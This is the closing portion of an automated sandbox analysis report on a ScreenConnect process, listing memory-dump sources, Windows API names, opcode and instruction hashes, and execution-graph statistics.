                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3287363648.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff848f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateNamedPipe
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2489174969-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1f419c2af990535ef1f55e865f9b2763a580a5c9aad4352a0910b1bb85ca6451
                                                                                                                                                                                                                                                                          • Instruction ID: c13c94a6f9d6748e8c9a63c6016a8bf62fa86cd17202bbf7900f7fd515f4915a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f419c2af990535ef1f55e865f9b2763a580a5c9aad4352a0910b1bb85ca6451
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7551807191CA1C8FDB68EF589845BE9BBE0FB59710F1042AEE04DE3241CB74A8468BC1

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: PH$XH$`H
                                                                                                                                                                                                                                                                          • API String ID: 0-2237122608
                                                                                                                                                                                                                                                                          • Opcode ID: 9546dbe7fcc2e977bd150cbbea06b92082262d404cfbe3a4d4471081c9d68371
                                                                                                                                                                                                                                                                          • Instruction ID: b656a8c41ca45f132168e411323b649a6a1ca10f204dec0f313539b8a7918681
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9546dbe7fcc2e977bd150cbbea06b92082262d404cfbe3a4d4471081c9d68371
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9561D532A0C99A4FEBD8EF289455AA177E1FF64760F0400B9C45ECB2D6DE25EC06C780

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0$I$8$I$$I
                                                                                                                                                                                                                                                                          • API String ID: 0-97904817
                                                                                                                                                                                                                                                                          • Opcode ID: 9cb2ce2a26ca8e576275a228443476c50cde2c16315da2f60d84421bb88de4a7
                                                                                                                                                                                                                                                                          • Instruction ID: 7d0754dbd9df55f17dba1b8b4132125effb1080aa0b260c609a6267ad8530bbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cb2ce2a26ca8e576275a228443476c50cde2c16315da2f60d84421bb88de4a7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0514631E0EADA4FF7A9BF3854155B5BBA0EF65390B0444FAC05DC71C3EE59A8058381

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: x$$I$x&$I
                                                                                                                                                                                                                                                                          • API String ID: 0-2601090195
                                                                                                                                                                                                                                                                          • Opcode ID: 3f112afa0485c325b7e2eaf2c470a226b9e8de731b4c83dffb6754af11b93f19
                                                                                                                                                                                                                                                                          • Instruction ID: 5a5695dc770b52d2df498b9b648a2bf9e3e8a90918c68c97b7b83cb4d099f2fb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f112afa0485c325b7e2eaf2c470a226b9e8de731b4c83dffb6754af11b93f19
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF121671A4DAAA4FF7A8FE2C98556B577D1FFA53A0F0400B9D05DC7193DD28AC068340

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: x$$I$x&$I
                                                                                                                                                                                                                                                                          • API String ID: 0-2601090195
                                                                                                                                                                                                                                                                          • Opcode ID: 472994bba11c330beb3039bac2b26a3652ed85cc50ebc6b404685e8b0d64691e
                                                                                                                                                                                                                                                                          • Instruction ID: 2245f93883afd256c53385df8ee625412b0c55884531305ab496432d9e18eba2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 472994bba11c330beb3039bac2b26a3652ed85cc50ebc6b404685e8b0d64691e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4C14B31A0EDA75FFB69FE2894418B5B7E1EF553A0B4401B9C45E87587EE15F80A83C0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3287363648.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff848f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7c902712f425c52401a9452800e31a53e87321f6164a52e93347e50a645c099e
                                                                                                                                                                                                                                                                          • Instruction ID: 6321b0231d45d8a79023bd59d804d0b86874f266644c33704a4bf9b72d1c8cdd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c902712f425c52401a9452800e31a53e87321f6164a52e93347e50a645c099e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E41563191CB488FEB14AFA8984A5E97BF0EF65750F04017FE049C3292DF68A846CB95

                                                                                                                                                                                                                                                                          Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: `;%I
• API String ID: 0-3585018813
• Opcode ID: 8e5378717e12a9cad0d37c8417bb93a8634d9c6b9991e0ddfb5b674954125db1
• Instruction ID: ad2e9ddce7a11adbd0ec741334e0f430919573207ae5633c533e32cfc0dc5619
• Opcode Fuzzy Hash: 8e5378717e12a9cad0d37c8417bb93a8634d9c6b9991e0ddfb5b674954125db1
• Instruction Fuzzy Hash: 8631FC52D1EAE64FF356AB3858691A4FFE0EF6239071D45FBC088CB1D7D919580A8311

                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD41B573C0E6E66FF321EE38A4A18F5BB90FF126ADB1901B7C0585B493DD19B806C651
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e3735422030f759c389fc257bfe8185634cdb8a0d12cbfb76f32f86ecdcbd822
                                                                                                                                                                                                                                                                          • Instruction ID: 8b8f92ce38b70620653c3d351795a50a79fb094a5ed33be3251a7a7fc93a23f1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3735422030f759c389fc257bfe8185634cdb8a0d12cbfb76f32f86ecdcbd822
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10319632C0E6A5AFE751FF3CE4A15E57BA0FF122ACB1901B6C0588A053DE1DB846C755
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6768fc0b91e255f79dea0f047532a3e24574cbae49d7f710750c2af9b5f73d7d
                                                                                                                                                                                                                                                                          • Instruction ID: 30d892fc4b302963ec0a286387488c87846b9c47e2edcb2b6f265b92ced1cdd1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6768fc0b91e255f79dea0f047532a3e24574cbae49d7f710750c2af9b5f73d7d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2821493190DAC94FE7A5AB3498040A6BBF1FF853A0B0406BAD49DC3192DF6CAC46C351
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: bf2331d55a162548be842a4f2d4e5fbba570d21839654eb1f1b7c95837ebde7b
                                                                                                                                                                                                                                                                          • Instruction ID: df976ebcdf98d4b0c6ab45d93a7df296cbfa2b15b346b2864785c73cc93b4b34
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf2331d55a162548be842a4f2d4e5fbba570d21839654eb1f1b7c95837ebde7b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A21B33254E3D5AFD307AB68D8659D67FB0EF8726470901E7D089CB0B3C61D584AC7A1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d442af5b1bfe28ecee07c15f304eee27bb41856ef71a58d443d7d50c2fa165e6
                                                                                                                                                                                                                                                                          • Instruction ID: 8c3d6a0996e6b9180bafdc654ba6b41a02c12be28609942a6061204b8ff0c145
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d442af5b1bfe28ecee07c15f304eee27bb41856ef71a58d443d7d50c2fa165e6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7511D33060CA884FE7D4EF38D4986B1B7E1FF99355B1401BED88DC72A6DE259841C745
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0a91e04272cff9f9891f5146d098376abdb3d79a441a2775ea18db2f9521b667
                                                                                                                                                                                                                                                                          • Instruction ID: 32a7d83074d2860abf6c362fb175f7f89a773b27f08d9a47f79040d1b1f57d2b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a91e04272cff9f9891f5146d098376abdb3d79a441a2775ea18db2f9521b667
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5011EF31A0C9584FF7D4EE28E858672B3D1FBE8365F1405BED84DC32A5DE25A880C744
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 874c89ae5f71fa436ad54c34adec99eff1759555c75e0eb0f14aaccc0a002498
                                                                                                                                                                                                                                                                          • Instruction ID: a61dcb1508316bf70cf9e4883e75679575ab413345e52611738f78a0d19b2081
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 874c89ae5f71fa436ad54c34adec99eff1759555c75e0eb0f14aaccc0a002498
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D11B233F0DD9E8FFBA9AB687C251F8B691EF44754F0404BAD02DC32D2DE6898118285
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1257878aa4d8d1c541b7e46435180c696195cf61a8e4b362a51a6ef06dda3f01
                                                                                                                                                                                                                                                                          • Instruction ID: 5ba650cbbe1b25689bbc7b48f04f1387cf510922aa8b6fc155b2a94b7fa871d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1257878aa4d8d1c541b7e46435180c696195cf61a8e4b362a51a6ef06dda3f01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96119375D0CA8A8FEBA5EF74A8914A87FB0FF55304F0540AAD06CC3296DA25A406CB01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9a9f6d94f033d840e69b12452317cbfa6bd11d3fa9b48998630331a41f2c101f
                                                                                                                                                                                                                                                                          • Instruction ID: 6532f381e37bb30bb3d8c8fb45871c637896a7dc12ad22d3cc12d04e58a62a73
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a9f6d94f033d840e69b12452317cbfa6bd11d3fa9b48998630331a41f2c101f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4811022190DEF30FF7B9A7294460375EAE2EF953A0F1881BAC45DC61E6DD2CAC818701
Memory Dump Source
• Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          • Opcode ID: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                                                                                                          • Instruction ID: 7a8f47472c194f0147828f4271d485437de05e23520256a2d043882db839b795
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DA00210E5D9665DF1717A1401011BD40410FB4BA0F204136D01E951C6DE1C6E42559A

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:13.8%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                          Total number of Nodes:10
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                          execution_graph 14074 7ff8492492e4 14075 7ff8492492ed 14074->14075 14076 7ff8492493e2 14075->14076 14077 7ff849249489 GlobalMemoryStatusEx 14075->14077 14078 7ff8492494b5 14077->14078 14069 7ff848f38014 14071 7ff848f3801d 14069->14071 14070 7ff848f38082 14071->14070 14072 7ff848f380f6 SetProcessMitigationPolicy 14071->14072 14073 7ff848f38152 14072->14073

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2950913559.00007FF849240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849240000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff849240000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1890195054-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8db51a0c392d536e6baa2ba683a49e094b35593e1a8625266c94ed36d5c14a94
                                                                                                                                                                                                                                                                          • Instruction ID: a64d97a0104139b66a679f07de9941f301e68a1fb0a458521b776d4867a34296
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db51a0c392d536e6baa2ba683a49e094b35593e1a8625266c94ed36d5c14a94
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0681473580DAE94FF775EB6888052B97FE0EF56760F0842BAD05CC75D3DA68680A8781

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2947400073.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff848f30000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                          • Opcode ID: 333d741d7e5fc5d6d192bee40d20980b3d31b98e01c1c8f1b9944990c9a60913
                                                                                                                                                                                                                                                                          • Instruction ID: dec6a6b2e33e3316c7aa4ea21b0cae1ea0ee35c45f006f3f812672e1fd7fac52
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 333d741d7e5fc5d6d192bee40d20980b3d31b98e01c1c8f1b9944990c9a60913
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99514531C1CB498FEB18AFA8984A5E97BE0EF55350F04017FE089C3192DF68A846CB95